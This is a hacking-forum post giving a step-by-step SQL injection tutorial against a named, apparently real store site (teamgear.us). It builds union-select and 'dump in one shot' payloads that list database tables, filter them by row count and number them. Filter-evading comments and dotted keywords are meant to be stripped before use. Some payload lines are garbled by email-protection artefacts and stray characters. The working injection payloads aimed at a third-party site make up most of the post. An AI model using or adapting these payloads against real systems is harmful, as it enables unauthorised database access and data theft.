hello coinorder member

today i am going to just share something new that i learned from here (hf ofcourse
)

actually nowadays i am working on janus advance challenges and learning something new everyday with these challenges also i am learning new things from master benzi and brother janus
so, let's try


target::
php code:

http://teamgear.us/store.php?id=1





lets start with our normal injection.
quote:

quote:

mean their are 15 total number of columns. so, now lest try our union select query.

php code:

http://teamgear.us/store.php?id=.1+/*!50000union*/+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -



so, columns==> 8 :: 5 :: 3 (2) are vulnerable cheerz.


now lets start playing with our dios/and its output.

˜†¸.€*˜†step 1˜†¸.€*˜†

lets try to display all the tables from the primary tables.

php code:

http://teamgear.us/store.php?id=.1+/*!50000union*/+all+select+1,2,3,4,5,6,7,(s.elect (@x) f.rom (s.elect (@x:=0x00), (s.elect (0) f.rom (i.nformation_s.chema.tables)
w.here (t.able_schema=d.atabase()) a.nd (0x00) in (@x:=c.oncat(@x,0x3c62723e,t.able_name))))x),9,10,11,12,13,14,15-- -



ps:just remove fullstop in unwanted places => . like s.elect

so, as you can see their are 5 tables in primary database.


˜†¸.€*˜†step 2˜†¸.€*˜†

lets try to add some conditions in our query like sometimes in challenges we got print the tables should have more then 30 records etc.

so, we can use if() function. (you can check master benzi tutorial on this. or on zhen bookmarks)
quote:
if(some_condition, return_if_some_condition_is_true, return_if_some_condition_is_false)


so, now our query will look something like this=>
php code:

if(table_rows>30,concat/**_**/(0x3c62723e,table__name,table_rows),0x00)




so, now what it will do is it will only show you those tables whose table table record is more then 30.

php code:

http://teamgear.us/store.php?id=.1+/*!50000union*/+all+select+1,2,3,4,5,6,7,(s.elect (@x) f.rom (s.elect (@x:=0x00), (s.elect (0) f.rom (i.nformation_schema.tables)
w.here (t.able_schema=d.atabase/**_**/()) a.nd (0x00) i.n (@x:=c.oncat(@x,
if(
table_rows>30, concat/**_**/(0x3c62723e3a3a, t.able_name,0x3a3a, table_rows), 0x00)
))))
x),9,10,11,12,13,14,15-- -




so, here is the output=>


so its now showing us all the tables whose data record is more then 30 and after :: -> in hex 0x3a3a its showing us all the count of the record.

˜†¸.€*˜†step 3˜†¸.€*˜†
so, now lets try to display number of the t.able_name

so, we will use new local variable running_number to our command.


php code:

(@running_number:[email protected]running_number%2b1)




%2b is + sign and we are adding +1 to our local variable running_number.

so, now our query will be like=>
php code:

http://teamgear.us/store.php?id=.1+/*!50000union*/+all+select+1,2,3,4,5,6,7,(s.elect (@x) f.rom (s.elect (@x:=0x00), (@running_number:=0),(s.elect (0) f.rom (i.nformation_schema.tables) w.here (t.able_schema=database/**_**/()) and (0x00) in (@x:=c.oncat(@x,0x3c62723e,(@running_number:[email protected] ing_number%2b1),0x2e20,t.€‹able_name))))x),9,10,1 1,12,13,14,15-- -





remove unwanted fullstops.

result=>


so, now we will use function lpad to display same height of 3 numbers.

like
php code:

001.
002.
003.




so, now we can use will use
quote:
lpad(str, len, padstr) which will return the string str, left-padded with the string padstr to a length of len characters.

so, now our len will be 3 (because we need to display number with lenght 3 but you can use 4 ,5 etc. according to your need).

so, now our query will be something like
php code:

lpad(@running_number:[email protected]running_number%2b1,3,0x30)



ps:here % 2 b is +.

so, now our query will be

code:

http://teamgear.us/store.php?id=.1+/...5,6,7,(s.elect (@x) f.rom (s.elect (@x:=0x00), (@running_number:=0),(s.elect (0) f.rom (i.nformation_schema.tables) w.here (t.able_schema=database/**_**/()) and (0x00) in (@x:=c.oncat(@x,0x3c62723e,lpad(@running_number:[email protected] running_number%2b1,3,0),0x2e20€‹,t.able_name))))x ),9,10,11,12,13,14,15-- -



hope this will be useful for new members here

quote:
special thanks to master benzi,janus , hooded robin , darkjin , codeninja , th3_uniqu3 , bd_injector and ofcourse my best friend krankenstein

please comment